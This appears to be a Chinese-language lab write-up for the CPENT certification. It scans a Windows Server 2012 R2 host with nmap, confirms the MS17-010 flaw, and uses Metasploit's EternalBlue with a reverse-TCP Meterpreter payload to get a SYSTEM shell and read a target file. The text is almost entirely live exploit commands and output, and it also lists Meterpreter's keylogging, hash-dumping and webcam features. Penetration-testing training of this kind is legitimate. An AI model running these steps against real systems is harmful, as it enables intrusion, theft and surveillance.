下一題:
老梗的nmap連線埠偵查:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.30.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 02:10 EDT
Nmap scan report for 172.16.30.4
Host is up (0.021s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
49155/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 104.25 seconds
┌──(root㉿kali)-[~]
└─# nmap -p135,139,445,5985,49155 172.16.30.4 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 02:13 EDT
Nmap scan report for 172.16.30.4
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Datacenter 9600 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49155/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h19m57s, deviation: 4h02m29s, median: -2s
|_nbstat: NetBIOS name: WIN-SU2M9G4F4S5, NetBIOS user: <unknown>, NetBIOS MAC: 00155d0136ca (Microsoft)
| smb2-time:
| date: 2023-03-26T06:14:30
|_ start_date: 2023-03-26T20:05:07
| smb2-security-mode:
| 302:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: WIN-SU2M9G4F4S5
| NetBIOS computer name: WIN-SU2M9G4F4S5\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-03-25T23:14:30-07:00
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 62.90 ms 192.168.200.1
2 62.90 ms 172.16.30.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.06 seconds
節錄其中一段:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
其實光靠這一段,有經驗的人就認為可能有MS17-010漏洞。假設有,就啟用metaspolit試試看: (CPENT沒有使用次數限制)
┌──(root㉿kali)-[~]
└─# msfconsole
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Writing a custom module? After editing your
module, why not try the reload command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transa
ction
NAMEDPIPE no A named pipe that can be connected t
o (leave blank for auto)
NAMED_PIPES /usr/share/metasploit yes List of named pipes to check
-framework/data/wordl
ists/named_pipes.txt
RHOSTS yes The target host(s), see https://docs
.metasploit.com/docs/using-metasploi
t/basics/using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on
target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an a
dmin share (ADMIN$,C$,...) or a norm
al read/write folder share
SMBDomain . no The Windows domain to use for authen
tication
SMBPass no The password for the specified usern
ame
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, no
ne)
LHOST 192.168.18.193 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_psexec) > use 2
msf6 auxiliary(admin/smb/ms17_010_command) > show options
Module options (auxiliary/admin/smb/ms17_010_command):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND net group "Domain Adm yes The command you want to execute on t
ins" /domain he remote host
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transa
ction
NAMEDPIPE no A named pipe that can be connected t
o (leave blank for auto)
NAMED_PIPES /usr/share/metasploit yes List of named pipes to check
-framework/data/wordl
ists/named_pipes.txt
RHOSTS yes The target host(s), see https://docs
.metasploit.com/docs/using-metasploi
t/basics/using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on
target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authen
tication
SMBPass no The password for the specified usern
ame
SMBSHARE C$ yes The name of a writeable share on the
server
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (ma
x one per host)
WINPATH WINDOWS yes The name of the remote Windows direc
tory
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 172.16.30.4
rhosts => 172.16.30.4
msf6 auxiliary(admin/smb/ms17_010_command) > run
[*] 172.16.30.4:445 - Target OS: Windows Server 2012 R2 Datacenter 9600
[*] 172.16.30.4:445 - Built a write-what-where primitive...
[+] 172.16.30.4:445 - Overwrite complete... SYSTEM session obtained!
[+] 172.16.30.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.30.4:445 - Getting the command output...
[*] 172.16.30.4:445 - Executing cleanup...
[+] 172.16.30.4:445 - Cleanup was successful
[+] 172.16.30.4:445 - Command completed successfully!
[*] 172.16.30.4:445 - Output for "net group "Domain Admins" /domain":
The request will be processed at a domain controller for domain WORKGROUP.
[*] 172.16.30.4:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
要注意,Auxiliary是偵察類的工具,所以使用2號得知dc是WORKGROUP的domain。
msf6 auxiliary(admin/smb/ms17_010_command) > use 3
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 172.16.30.4
rhosts => 172.16.30.4
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 172.16.30.4:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Datacenter 9600 x64 (64-bit)
[*] 172.16.30.4:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
使用3號得知,這主機很可能有這個ms17-010漏洞。
msf6 auxiliary(scanner/smb/smb_ms17_010) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.c
om/docs/using-metasploit/basics/using-metasploit.
html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authenti
cation. Only affects Windows Server 2008 R2, Wind
ows 7, Windows Embedded Standard 7 target machine
s.
SMBPass no (Optional) The password for the specified usernam
e
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Targ
et. Only affects Windows Server 2008 R2, Windows
7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only a
ffects Windows Server 2008 R2, Windows 7, Windows
Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, no
ne)
LHOST 192.168.18.193 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.30.4
rhosts => 172.16.30.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.200.4
lhost => 192.168.200.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 8081
lport => 8081
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets
Exploit targets:
=================
Id Name
-- ----
=> 0 Automatic Target
1 Windows 7
2 Windows Embedded Standard 7
3 Windows Server 2008 R2
4 Windows 8
5 Windows 8.1
6 Windows Server 2012
7 Windows 10 Pro
8 Windows 10 Enterprise Evaluation
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.200.4:8081
[*] 172.16.30.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.30.4:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Datacenter 9600 x64 (64-bit)
[*] 172.16.30.4:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.16.30.4:445 - The target is vulnerable.
[*] 172.16.30.4:445 - shellcode size: 1283
[*] 172.16.30.4:445 - numGroomConn: 12
[*] 172.16.30.4:445 - Target OS: Windows Server 2012 R2 Datacenter 9600
[+] 172.16.30.4:445 - got good NT Trans response
[+] 172.16.30.4:445 - got good NT Trans response
[+] 172.16.30.4:445 - SMB1 session setup allocate nonpaged pool success
[+] 172.16.30.4:445 - SMB1 session setup allocate nonpaged pool success
[+] 172.16.30.4:445 - good response status for nx: INVALID_PARAMETER
[+] 172.16.30.4:445 - good response status for nx: INVALID_PARAMETER
[*] Sending stage (200774 bytes) to 172.16.30.4
[*] Meterpreter session 1 opened (192.168.200.4:8081 -> 172.16.30.4:49158) at 2023-03-26 02:42:57 -0400
雖然沒有2012 R2這個target,但還是入侵成功了。
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unic Disables encoding of unicode strings
ode_encoding
enable_unico Enables encoding of unicode strings
de_encoding
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
ssl_verify Modify the SSL certificate verification setting
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_sen Send keystrokes
d
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_star Start capturing keystrokes
t
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_strea Play a video stream from the specified webcam
m
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > search -f secret.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Administrator\Documents\Secret.txt 10 2021-12-22 01:40:18 -0500
meterpreter > cat c:\\Users\\Administrator\\Documents\\Secret.txt
axm42fk2gp
也可以輸入shell,進入靶機環境找檔案
meterpreter > shell
Process 864 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd \
cd \
C:\>dir secret.txt /s
dir secret.txt /s
Volume in drive C has no label.
Volume Serial Number is A898-C5B1
Directory of C:\Users\Administrator\Documents
12/21/2021 11:40 PM 10 Secret.txt
1 File(s) 10 bytes
Total Files Listed:
1 File(s) 10 bytes
0 Dir(s) 125,540,614,144 bytes free
C:\>type C:\Users\Administrator\Documents\Secret.txt
type C:\Users\Administrator\Documents\Secret.txt
axm42fk2gp
![[ 筆記 ] Express 03 - ORM & Sequelize](https://mtr04-note.coderbridge.io/2020/10/10/sequelize/?utm_source=coderbridge-io&utm_medium=blog_related_post_img&utm_campaign=little C Blog_[ 筆記 ] Express 03 - ORM & Sequelize_@krebikshaw_https://static.coderbridge.com/img/krebikshaw/2435c265064c42358a4e8edc1a02bf7d.jpg)
